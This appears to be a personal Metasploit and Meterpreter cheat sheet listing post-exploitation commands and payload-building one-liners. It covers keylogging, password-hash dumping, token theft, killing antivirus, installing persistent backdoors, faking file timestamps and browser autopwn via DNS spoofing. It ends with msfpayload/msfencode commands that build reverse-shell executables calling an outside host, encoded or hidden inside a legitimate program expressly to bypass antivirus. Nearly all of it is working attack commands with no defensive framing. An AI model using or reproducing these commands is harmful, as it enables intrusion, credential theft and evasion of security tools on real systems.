Meterpreter
Process:
getuid shows user id
getpid shows meterpreter process id
ps lists running processes
migrate [ps] migrates to given process (one that won't end/crash)
idletime shows how long machine has been idle for
keyscan_start starts the key logger
keyscan_dump outputs captured data
keyscan_stop stops the keylogger
execute -f cmd.exe -c opens a new cmd.exe and creates a new channel for it
channel -l lists the open channels
read [channel] outputs data from channel
interact [channel] allows you to jump into the channel
write [channel] sends data to the channel
close [channel] kills the channel
enumdesktops shows currently open desktops such as winlogon etc
getdesktop shows current desktop session meterpreter is in
setdesktop changes to an already open desktop session
uictl disable keyboard disables the keyboard of the desktop session
timestomp file.txt -c "30/12/1980 12:12:34" changes the timestamp of the file
timestomp file.txt -f sourcefile.txt copies the timestamp from sourcefile.txt
use priv to load the priv extras
hashdump to dump the SAM file :-)
use incognito loads the incognito into meterpreter
list_tokens -u shows stealable tokens
impersonate_token allows a token to be stolen
steal_token [psid] steals the token of a process
rev2self reverts to original token
run post/windows/gather/cachedump gets cached domain hashes
Sniffer: allows promiscuous mode to be enabled
use sniffer loads the sniffer functions
sniffer_interfaces lists interfaces 1,2,3,4,5,6, etc
sniffer_start [n] starts the sniffer for the interface
sniffer_stats [n] lists packets, time, etc..
sniffer_dump [n] file.pcap dumps the capture locally
sniffer_stop you guessed it ;-)
run checkvm checks if the target is a vm
run credscollect dumps hashes and tokens to screen
run enum_firefox dumps temp internet files from firefox – cookies, passwords, etc :-)
run get_application_list shows installed applications
run killav tries to stop all known AV progs
run get_local_subnets enumerates local subnet info
run metsvc creates a backdoor
run persistence survives a reboot (without admin or system)
run schedulme -e file.exe -m 30 you'll need to manually load the meterpreter.exe payload
run kitrap0d allows priv escalation using CVE-2010-0232
web browser exploit
use auxiliary/server/browser_autopwn
set LHOST [local_ip]
set SRVPORT 80
set URIPATH /
run
#now get the client to connect to you (use ettercap dns)
inbuilt sqlite db
db_driver sqlite3 starts the db using sqlite (file based)
db_connect job creates a new db called job and connects to it
db_hosts shows hosts
db_services shows visible services
db_nmap -sS [target_ip] performs nmap against target and stores in db
db_import_nmap_xml allows import of nmap xml output
db_autopwn -p -e -r -t autopwn from db vulns
Meterpreter Payload Backdoor
./msfpayload windows/meterpreter/reverse_tcp LHOST=phillipshome.getmyip.com LPORT=4444 X > clear.exe
./msfpayload windows/meterpreter/reverse_tcp LHOST=phillipshome.getmyip.com LPORT=4444 R | ./msfencode -e x86/shikata_ga_nai -c 5 -t exe -o encoded.exe
sets the payload as meterpreter and then encodes it 5 times to bypass AV
./msfpayload windows/meterpreter/reverse_tcp LHOST=phillipshome.getmyip.com LPORT=4444 R | ./msfencode -t exe -x /mnt/hgfs/tools/exploits/spider.exe -k -o /share/spider.exe -e x86/shikata_ga_nai -c 5
#this fucker bypasses sophos
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=4444 E
One Liners
# One liner meterpreter reverse_tcp
/pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=`ifconfig | grep 'inet addr:' | grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'` LPORT=4444 X > /root/clear.exe
# One liner shikata encoded meterpreter reverse_tcp
/pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=`ifconfig | grep 'inet addr:' | grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'` LPORT=4444 R | /pentest/exploits/framework3/msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /root/encoded.exe
# One liner encoded and hidden in windows exe meterpreter reverse_tcp
/pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=`ifconfig | grep 'inet addr:' | grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'` LPORT=4444 R | /pentest/exploits/framework3/msfencode -t exe -x /mnt/hgfs/tools/exploits/spider.exe -k -o /root/spider.exe -e x86/shikata_ga_nai -c 5